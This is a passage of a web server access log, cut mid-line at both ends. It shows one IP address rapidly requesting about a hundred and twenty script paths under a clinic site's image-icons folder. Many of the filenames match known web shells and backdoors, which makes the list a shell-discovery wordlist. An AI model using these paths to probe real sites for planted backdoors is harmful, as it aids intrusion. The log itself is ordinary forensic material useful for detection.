Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:42 -0400] "GET /our-clinics/img/icons/usage.jsp HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:42 -0400] "GET /our-clinics/img/icons/ff2.php HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:43 -0400] "GET /our-clinics/img/icons/zex.php HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:43 -0400] "GET /our-clinics/img/icons/xml.php HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:44 -0400] "GET /our-clinics/img/icons/a.php HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:44 -0400] "GET /our-clinics/img/icons/authorize.php HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:45 -0400] "GET /our-clinics/img/icons/count.php HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:45 -0400] "GET /our-clinics/img/icons/log.php HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:45 -0400] "GET /our-clinics/img/icons/lol.php HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:46 -0400] "GET /our-clinics/img/icons/post.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:46 -0400] "GET /our-clinics/img/icons/i.php HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:47 -0400] "GET /our-clinics/img/icons/n.php HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:47 -0400] "GET /our-clinics/img/icons/o.php HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:47 -0400] "GET /our-clinics/img/icons/p.php HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:48 -0400] "GET /our-clinics/img/icons/css.php HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:48 -0400] "GET /our-clinics/img/icons/search.php HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:49 -0400] "GET /our-clinics/img/icons/raw.php HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:49 -0400] "GET /our-clinics/img/icons/image.php HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:49 -0400] "GET /our-clinics/img/icons/xxx.php HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:50 -0400] "GET /our-clinics/img/icons/alexus.php HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:50 -0400] "GET /our-clinics/img/icons/tbl_status.php HTTP/1.1" 301 272 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:51 -0400] "GET /our-clinics/img/icons/setup.php HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:51 -0400] "GET /our-clinics/img/icons/wp-site.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:52 -0400] "GET /our-clinics/img/icons/profile.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:52 -0400] "GET /our-clinics/img/icons/wp-blog.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:52 -0400] "GET /our-clinics/img/icons/owl.php HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:53 -0400] "GET /our-clinics/img/icons/system.php HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:53 -0400] "GET /our-clinics/img/icons/w3llstore.php HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:54 -0400] "GET /our-clinics/img/icons/load.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:54 -0400] "GET /our-clinics/img/icons/form.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:54 -0400] "GET /our-clinics/img/icons/font-awesome.max6.jsp HTTP/1.1" 301 279 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:55 -0400] "GET /our-clinics/img/icons/spacer.jsp HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:55 -0400] "GET /our-clinics/img/icons/idpost.jsp HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:56 -0400] "GET /our-clinics/img/icons/HelpSessions.jsp HTTP/1.1" 301 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:56 -0400] "GET /our-clinics/img/icons/welcome.jsp HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:57 -0400] "GET /our-clinics/img/icons/iisstart.aspx HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:57 -0400] "GET /our-clinics/img/icons/radio.php HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:58 -0400] "GET /our-clinics/img/icons/wp-2019.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:58 -0400] "GET /our-clinics/img/icons/wp-atom.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:58 -0400] "GET /our-clinics/img/icons/output.php HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:59 -0400] "GET /our-clinics/img/icons/testmail.php HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:37:59 -0400] "GET /our-clinics/img/icons/lock360.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:00 -0400] "GET /our-clinics/img/icons/xmlrp.php HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:00 -0400] "GET /our-clinics/img/icons/todo.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:00 -0400] "GET /our-clinics/img/icons/02.php HTTP/1.1" 301 264 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:01 -0400] "GET /our-clinics/img/icons/tunnel.jsp HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:01 -0400] "GET /our-clinics/img/icons/tunnel.js HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:02 -0400] "GET /our-clinics/img/icons/tunnel.aspx HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:02 -0400] "GET /our-clinics/img/icons/tunnel.ashx HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:03 -0400] "GET /our-clinics/img/icons/.wp-activate.php HTTP/1.1" 301 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:03 -0400] "GET /our-clinics/img/icons/.admin.php HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:03 -0400] "GET /our-clinics/img/icons/del.php HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:04 -0400] "GET /our-clinics/img/icons/site-new.php HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:04 -0400] "GET /our-clinics/img/icons/class-wp-text-diff-renderer-table.php HTTP/1.1" 301 295 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:05 -0400] "GET /our-clinics/img/icons/expect.php HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:05 -0400] "GET /our-clinics/img/icons/privacy.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:05 -0400] "GET /our-clinics/img/icons/man.php HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:06 -0400] "GET /our-clinics/img/icons/sts.php7 HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:06 -0400] "GET /our-clinics/img/icons/psh.php HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:07 -0400] "GET /our-clinics/img/icons/gel4y.php HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:07 -0400] "GET /our-clinics/img/icons/checkbex.php HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:07 -0400] "GET /our-clinics/img/icons/classsmtps.php HTTP/1.1" 301 272 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:08 -0400] "GET /our-clinics/img/icons/gawean.PhP7 HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:08 -0400] "GET /our-clinics/img/icons/head.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:09 -0400] "GET /our-clinics/img/icons/bb.php7 HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:09 -0400] "GET /our-clinics/img/icons/f35.php HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:10 -0400] "GET /our-clinics/img/icons/elp.php HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:10 -0400] "GET /our-clinics/img/icons/phpx.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:10 -0400] "GET /our-clinics/img/icons/asasx.php HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:11 -0400] "GET /our-clinics/img/icons/cart.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:11 -0400] "GET /our-clinics/img/icons/wp-kwala.php HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:12 -0400] "GET /our-clinics/img/icons/classfuns.php HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:12 -0400] "GET /our-clinics/img/icons/siteheads.php HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:12 -0400] "GET /our-clinics/img/icons/soul.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:13 -0400] "GET /our-clinics/img/icons/psm.php7 HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:13 -0400] "GET /our-clinics/img/icons/sts.php8 HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:14 -0400] "GET /our-clinics/img/icons/msleaf.php8 HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:14 -0400] "GET /our-clinics/img/icons/Ova-Simple.php HTTP/1.1" 301 272 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:15 -0400] "GET /our-clinics/img/icons/readme.txt HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:15 -0400] "GET /our-clinics/img/icons/chtmlfuns.php HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:15 -0400] "GET /our-clinics/img/icons/cmd-pro.jsp HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:16 -0400] "GET /our-clinics/img/icons/greeting.jsp HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:16 -0400] "GET /our-clinics/img/icons/id_win.jsp HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:17 -0400] "GET /our-clinics/img/icons/l0g.jsp HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:17 -0400] "GET /our-clinics/img/icons/output.php.malware HTTP/1.1" 301 276 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:17 -0400] "GET /our-clinics/img/icons/melumang.php HTTP/1.1" 301 270 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:18 -0400] "GET /our-clinics/img/icons/ioxi-o.php HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:18 -0400] "GET /our-clinics/img/icons/term.php HTTP/1.1" 301 266 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:19 -0400] "GET /our-clinics/img/icons/update.php HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:19 -0400] "GET /our-clinics/img/icons/wp-rss.php HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:20 -0400] "GET /our-clinics/img/icons/fox.php HTTP/1.1" 301 265 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:20 -0400] "GET /our-clinics/img/icons/difficulty.php HTTP/1.1" 301 272 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:20 -0400] "GET /our-clinics/img/icons/wp-commentsrss2.php HTTP/1.1" 301 277 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:21 -0400] "GET /our-clinics/img/icons/wp-feed.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:21 -0400] "GET /our-clinics/img/icons/wp-pass.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:22 -0400] "GET /our-clinics/img/icons/wp-rdf.php HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0" 89.188.76.176 - - [12/Aug/2025:10:38:22 -0400] "GET /our-clinics/img/icons/wp-rss2.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like 